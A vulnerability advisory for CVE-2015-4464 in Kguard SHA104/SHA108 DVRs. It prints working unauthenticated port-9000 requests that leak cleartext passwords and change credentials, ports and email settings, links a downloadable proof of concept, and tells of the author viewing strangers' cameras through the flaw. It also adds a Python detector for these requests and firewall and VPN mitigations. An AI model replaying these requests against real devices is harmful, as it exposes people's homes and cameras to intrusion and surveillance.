CVE-2015-4464: MULTIPLE VULNERABILITIES WITH KGUARD DIGITAL VIDEO RECORDERS
http://www.securityfocus.com/archive/1/534830
Researcher: Federick Joe Fajardo / fjpfajardo(at)ph.ibm.com
Initial disclosure: February 10, 2015
CVE assignment: June 10, 2015
Proof of Concept: June 15, 2015
PROOF OF CONCEPT CAN BE DOWNLOADED AT: https://goo.gl/L5ASRo
PRODUCT DESCRIPTION
The Kguard SHA104 & SHA108 are 4ch/8ch H.264 DVRs designed for economical
applications. Their stylish, streamlined hardware design and excellent
performance make them a fast-moving, competitive and ideal solution for
entry-level & distribution channels.
VENDOR REFERENCE:
http://us.kworld-global.com/main/prod_in.aspx?mnuid=1306&modid=10&prodid=527
VULNERABILITY DESCRIPTION
1. Insufficient authentication and authorization
Kguard SHA104 / SHA108 Insufficient Authorization Checks Request Handling
Remote Authentication Bypass, http://osvdb.org/show/osvdb/119402
A deficiency in the handling of authentication and authorization has been
found in the Kguard 104/108 models. While password-based authentication is
used by the ActiveX component to protect the login page, all communication
with the application server on port 9000 can be carried out directly, with
insufficient or improper authorization checks.
The request HI_SRDK_SYS_USERMNG_GetUserList, for example, returns all the
usernames in the system together with their passwords in cleartext. The
example below is an actual, unmodified request and response from the server.
REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0
CSeq:6
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:51
3Segment-Num:1
Segment-Seq:1
Data-Length:4
VMCTP/1.0 200 OK
Content-Type:text/HDP
CSeq:6
Return-Code:0
Content-Length:2326
Segment-Num:2
Segment-Seq:1
Data-Length:2240
eric
111222
111222
admin
111222
111222
333444
333444
555666
555666
user4
user5
user6
Segment-Seq:2
Data-Length:4
Another interesting request is HI_SRDK_NET_MOBILE_GetOwspAttr. If the
mobile service is configured, it allows mobile devices to access and monitor
the cameras on port 18004, and the request returns the credentials for that
service. An actual, unmodified request and response is shown below.
REMOTE HI_SRDK_NET_MOBILE_GetOwspAttr MCTP/1.0
CSeq:15
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:15
Segment-Num:0
VMCTP/1.0 200 OK
Content-Type:text/HDP
CSeq:15
Return-Code:0
Content-Length:161
Segment-Num:1
Segment-Seq:1
Data-Length:112
admin
111222
From this example, the credentials of this user can easily be changed by
executing the HI_SRDK_NET_MOBILE_SetOwspAttr request shown below, and the
change can be made persistent by executing HI_SRDK_DEV_SaveFlash:
REMOTE HI_SRDK_NET_MOBILE_SetOwspAttr MCTP/1.0
CSeq:1
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:161
Segment-Num:1
Segment-Seq:1
Data-Length:112
admin.t..|A<.......n(...........111222444.eted!.p.c<.... ...
...TF..............................................
The logs of the application server confirm that the request was executed
successfully:
[MCTP] [HI_MCTP_MethodProc_Remote] SUCCESS!!!!!
/home/yala/svn/D9108_MLANG_QSEE/dvr/modules/vscp/mctp/server/hi_vscp_mctp_mthdproc.c
606========================
GetNetworkState:192.168.254.200
Logs from the DVR also show that an existing mobile device that tries to
connect on port 18004 with the previously stored credentials now fails:
< StreamingServer> [ run] A client(116) connected[2010-09-11 12:30].
< LangtaoCommProto> [ handlePacketBody] Input buffer total length: 60
< LangtaoCommProto> [ handlePacketBody] tlv type: 41
< LangtaoCommProto> [ handlePacketBody] tlv length: 56
< LangtaoCommProto> [ handlePacketBody] Login request received.
< LangtaoCommProto> [ handleLoginReq] User Name: admin Passwrod: 111222
< LangtaoCommProto> [ handleLoginReq] User name and/or password validate fail.
< StreamingServer> [ handleRequest2] Send response to client.
< StreamingServer> [ handleRequest2] Session closed actively.
< StreamingServer> [ run] Handle request fail.
----------------------- SESSION(116) END -----------------------
2. Lack of transport security
Kguard SHA104 / SHA108 HiDvrOcx.cab ActiveX Unencrypted Transmission MitM
Request Manipulation, http://osvdb.org/show/osvdb/119422
Communication with the application server is performed by an ActiveX
component that is served to the browser during its initial session, and the
traffic is not encrypted. The lack of transport encryption means that any
request from this component to the application server can be observed and
manipulated in transit. The component is distributed as HiDvrOcx.cab.
Extracting the file shows the libraries it bundles:
-rw-rw-r--. 1 fjpfajardo fjpfajardo 1443576 Mar 11 2011 HiDvrOcx.ocx
-rw-rw-r--. 1 fjpfajardo fjpfajardo 1443 Mar 11 2011 HiDvrOcx.inf
-rw-rw-r--. 1 fjpfajardo fjpfajardo 27136 Mar 11 2011 HiDvrOcxESN.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxITA.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxBRG.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 20992 Mar 11 2011 HiDvrOcxJPN.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 155648 Mar 11 2011 HiDvrNet.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 487525 Mar 11 2011 HiDvrMedia.dll
Interestingly, inspecting the strings of the DLL named HiDvrNet.dll reveals
the other request methods that the component can send to the application
server:
HI_SRDK_NET_MOBILE_GetOwspAttr
HI_SRDK_NET_MOBILE_SetAttr
HI_SRDK_NET_MOBILE_SetOwspAttr
HI_SRDK_NET_Network_DHCP_Client_GetAttr
HI_SRDK_NET_Network_DHCP_Client_SetAttr
HI_SRDK_NET_Network_GetDNSList
HI_SRDK_NET_Network_GetDefaultGateway
HI_SRDK_NET_Network_GetNetdevAttr
HI_SRDK_NET_Network_GetNetdevName
HI_SRDK_NET_Network_SetDNSList
HI_SRDK_NET_Network_SetDefaultGateway
HI_SRDK_NET_Network_SetNetdevAttr
HI_SRDK_NET_SetDdnsAttr
HI_SRDK_NET_SetEmailAttr
HI_SRDK_NET_SetIppreviewVodAttr
HI_SRDK_NET_SetMctpServerPort
HI_SRDK_NET_SetPppoeAttr
HI_SRDK_NET_SetWebServerPort
HI_SRDK_Open_Device
HI_SRDK_RECORDER_GetPlaybackAttr
HI_SRDK_RECORDER_GetRecordAttr
HI_SRDK_RECORDER_GetRecordSchedule
HI_SRDK_RECORDER_SetRecordAttr
HI_SRDK_RECORDER_SetRecordSchedule
HI_SRDK_SYS_GetDaylightAttr
HI_SRDK_SYS_GetSysMaintainAttr
HI_SRDK_SYS_GetSystemAttr
HI_SRDK_SYS_SetDaylightAttr
HI_SRDK_SYS_SetSysMaintainAttr
HI_SRDK_SYS_SetSystemAttr
HI_SRDK_SYS_USERMNG_AddGroup
HI_SRDK_SYS_USERMNG_AddUser
HI_SRDK_SYS_USERMNG_DelGroup
HI_SRDK_SYS_USERMNG_DelUser
HI_SRDK_SYS_USERMNG_Disable
HI_SRDK_SYS_USERMNG_Enable
HI_SRDK_SYS_USERMNG_GetAuthorityList
HI_SRDK_SYS_USERMNG_GetGroupList
HI_SRDK_SYS_USERMNG_GetUserList
HI_SRDK_SYS_USERMNG_ModifyGroupInfo
HI_SRDK_SYS_USERMNG_ModifyUserInfo
3. Denial of Service and Command Injection
Kguard SHA104 / SHA108 Multiple Field Handling Remote Command Execution,
http://osvdb.org/show/osvdb/119403
Input in some of the fields is neither sanitized nor filtered, which may
lead to a passive denial of service and/or command injection. By altering
requests such as HI_SRDK_NET_SetPppoeAttr,
HI_SRDK_NET_Network_DHCP_Client_SetAttr, HI_SRDK_NET_SetWebServerPort or
HI_SRDK_NET_Network_SetDefaultGateway, a malicious user may be able to
disrupt connectivity to the DVR. The example below changes the MCTP server
port and then persists the change:
REMOTE HI_SRDK_NET_SetMctpServerPort MCTP/1.0
CSeq:58
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:49
1Segment-Num:1
Segment-Seq:1
Data-Length:2
REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0
CSeq:61
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:15
Segment-Num:0
The device has no authentication or authorization between the ActiveX
component and the application server, allowing anyone to interact directly
with the application server's controls and make unauthorized modifications
to the device's configuration.
As an example, by sending the request HI_SRDK_NET_SetEmailAttr, anyone can
change the DVR's email settings, so that snapshot images from the cameras
are sent to an arbitrary email address, compromising privacy.
REMOTE HI_SRDK_NET_SetEmailAttr MCTP/1.0
CSeq:1
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:3426
Segment-Num:1
Segment-Seq:1
Data-Length:3376
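Sections 1 and 3 both come down to the same thing for a defender: any host that can reach TCP/9000 can read credentials, change settings and persist them with HI_SRDK_DEV_SaveFlash, so the useful control is to watch (or block) that port for requests from anywhere other than the monitoring station. The following is an added example, my own code rather than anything from the advisory, the vendor or the proof of concept. It parses the text framing exactly as the advisory prints it (a "REMOTE <method> MCTP/1.0" line followed by "Name:value" header lines; the real wire framing may differ, which is an assumption) and raises an alert for each sensitive method seen from a source outside an allowlist, noting which unsaved changes a SaveFlash request would persist. The capture list, the 203.0.113.7 source and the impact labels are constructed for the example.

```python
import ipaddress
import re
from dataclasses import dataclass, field

# Request line as printed in the advisory: "REMOTE <method> MCTP/1.0".
REQUEST_LINE = re.compile(r"^REMOTE (\S+) MCTP/(\d+\.\d+)$")

# Methods named in the advisory, tagged with what an unauthenticated caller
# obtains from them (impact labels are this example's own wording).
SENSITIVE_METHODS = {
    "HI_SRDK_SYS_USERMNG_GetUserList": "credential disclosure",
    "HI_SRDK_NET_MOBILE_GetOwspAttr": "credential disclosure",
    "HI_SRDK_NET_MOBILE_SetOwspAttr": "credential change",
    "HI_SRDK_SYS_USERMNG_AddUser": "credential change",
    "HI_SRDK_SYS_USERMNG_ModifyUserInfo": "credential change",
    "HI_SRDK_NET_SetMctpServerPort": "network tampering",
    "HI_SRDK_NET_SetPppoeAttr": "network tampering",
    "HI_SRDK_NET_Network_DHCP_Client_SetAttr": "network tampering",
    "HI_SRDK_NET_SetWebServerPort": "network tampering",
    "HI_SRDK_NET_Network_SetDefaultGateway": "network tampering",
    "HI_SRDK_NET_SetEmailAttr": "privacy / exfiltration",
    "HI_SRDK_DEV_SaveFlash": "persistence",
}
PERSIST_METHOD = "HI_SRDK_DEV_SaveFlash"
CHANGE_IMPACTS = {"credential change", "network tampering", "privacy / exfiltration"}


@dataclass
class MctpRequest:
    method: str
    version: str
    headers: dict = field(default_factory=dict)


def parse_request(text):
    """Parse one MCTP request header block as shown in the advisory.
    Assumption: headers are newline-separated "Name:value" lines directly
    after the request line, and the body starts at the first blank line or
    the first line without a colon. Returns None for non-MCTP input."""
    lines = text.strip().splitlines()
    if not lines:
        return None
    m = REQUEST_LINE.match(lines[0].strip())
    if not m:
        return None
    req = MctpRequest(method=m.group(1), version=m.group(2))
    for line in lines[1:]:
        line = line.strip()
        if not line or ":" not in line:
            break  # blank line or body data: headers are over
        name, _, value = line.partition(":")
        req.headers[name.strip()] = value.strip()
    return req


def scan_captures(captures, allowed_sources):
    """captures: iterable of (src_ip, payload_text) observed on TCP/9000.
    Returns one alert per sensitive request from a source outside
    allowed_sources. A SaveFlash alert also lists the earlier, not yet
    saved changes from the same source that it would make permanent."""
    alerts = []
    pending_changes = {}  # src_ip -> config-changing methods not yet saved
    for src_ip, payload in captures:
        req = parse_request(payload)
        if req is None:
            continue
        impact = SENSITIVE_METHODS.get(req.method)
        if impact is None:
            continue
        src = ipaddress.ip_address(src_ip)
        if any(src in net for net in allowed_sources):
            continue
        alert = {"src": src_ip, "method": req.method, "impact": impact,
                 "cseq": req.headers.get("CSeq")}
        if req.method == PERSIST_METHOD:
            alert["persists"] = pending_changes.pop(src_ip, [])
        elif impact in CHANGE_IMPACTS:
            pending_changes.setdefault(src_ip, []).append(req.method)
        alerts.append(alert)
    return alerts


# Constructed sample traffic; header blocks follow the advisory's own dumps.
GET_USER_LIST = ("REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0\n"
                 "CSeq:6\nAccept:text/HDP\nContent-Type:text/HDP\n"
                 "Func-Version:0x10\nContent-Length:51\n"
                 "Segment-Num:1\nSegment-Seq:1\nData-Length:4\n")
SET_OWSP = ("REMOTE HI_SRDK_NET_MOBILE_SetOwspAttr MCTP/1.0\n"
            "CSeq:1\nAccept:text/HDP\nContent-Type:text/HDP\n"
            "Func-Version:0x10\nContent-Length:161\n"
            "Segment-Num:1\nSegment-Seq:1\nData-Length:112\n"
            "admin....111222444\n")  # constructed stand-in for the binary body
SAVE_FLASH = ("REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0\n"
              "CSeq:61\nAccept:text/HDP\nContent-Type:text/HDP\n"
              "Func-Version:0x10\nContent-Length:15\nSegment-Num:0\n")
GET_SYSTEM = "REMOTE HI_SRDK_SYS_GetSystemAttr MCTP/1.0\nCSeq:2\nAccept:text/HDP\n"
NOT_MCTP = "GET / HTTP/1.1\nHost: dvr\n"

SAMPLE_CAPTURES = [
    ("192.168.254.10", GET_USER_LIST),  # LAN monitoring station, allowlisted
    ("203.0.113.7", GET_USER_LIST),     # constructed external source
    ("203.0.113.7", SET_OWSP),
    ("203.0.113.7", GET_SYSTEM),        # read-only, not in the sensitive set
    ("203.0.113.7", SAVE_FLASH),
    ("203.0.113.7", NOT_MCTP),
]
ALLOWED_SOURCES = [ipaddress.ip_network("192.168.254.0/24")]

if __name__ == "__main__":
    for alert in scan_captures(SAMPLE_CAPTURES, ALLOWED_SOURCES):
        print(alert)
```

Run against the sample, the allowlisted LAN request is ignored and three alerts are raised for the external source: the credential disclosure, the credential change, and the SaveFlash that persists it. In a real deployment the capture list would be fed from a TCP/9000 tap, and the allowlist would be the same address set the firewall in the resolution section permits, so the detector only fires on traffic the firewall should already have dropped.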
The application server that listens for incoming requests on port 9000 is
run by a binary called raysharp_dvr, which suggests that the hardware
manufacturer is Zhuhai RaySharp Technology Co. While the purpose of this
vulnerability analysis is mainly Kguard-related DVRs, I believe that other
devices that use the same firmware from the manufacturer and are rebranded
in the market are also vulnerable.
576 root 20696 S ./raysharp_dvr
577 root 20696 S ./raysharp_dvr
578 root 20696 S ./raysharp_dvr
CAMERAS FROM AROUND THE WORLD
Digital Video Recorders (DVRs) are detective controls which are meant to be
an integral part of a physical and logical security implementation. But
what happens if the device you are using for surveillance is the same
device that hackers are using to watch over your shoulder?
Below are some of the cameras I have visited from around the world. All of
these security cameras are connected to a vulnerable device which was
exploited using the vulnerability. Please take note that none of the
configuration of these devices has been changed. The credentials have been
removed after creating this document, and the screen captures were gathered
for the purpose of creating the proof of concept only.
The following links show screenshots of how to run the PoC:
https://goo.gl/SLKSqx
https://goo.gl/Wa42ZX
https://goo.gl/O2PPzh
https://goo.gl/lDqHdC
FIX AND RESOLUTION
Currently there is no fix or known firmware update for this vulnerability.
I own the device myself and I used to connect to this device for remote
monitoring. Buying another DVR isn't practical for me, but totally ignoring
this problem isn't good for me either. If your device is connected to the
Internet from a public IP address, there is a risk that your device may be
exposed and exploited. However, you can do the following setup to prevent
someone from breaking into your device:
1. If you do not need to do remote monitoring, do not connect/hook your
device directly to the Internet.
2. The device must be connected and accessible only to your local network.
This will lessen the chance that someone might be watching your home or
office from other parts of the world.
3. If remote monitoring is required, change the default ports of the
device. The default ports are: TCP/80, TCP/5000, TCP/9000, TCP/18004.
These ports must be set to a higher port value where the chance of being
scanned is lower.
4. If you are monitoring the device remotely from a location where a static
IP is configured, set up the firewall for the device to accept only traffic
from that IP address.
5. If mobile monitoring matters to you, configure VPN access on your
network so remote connections to the device are tunnelled and treated as
local connections. I am using this setup via OpenVPN.
EOF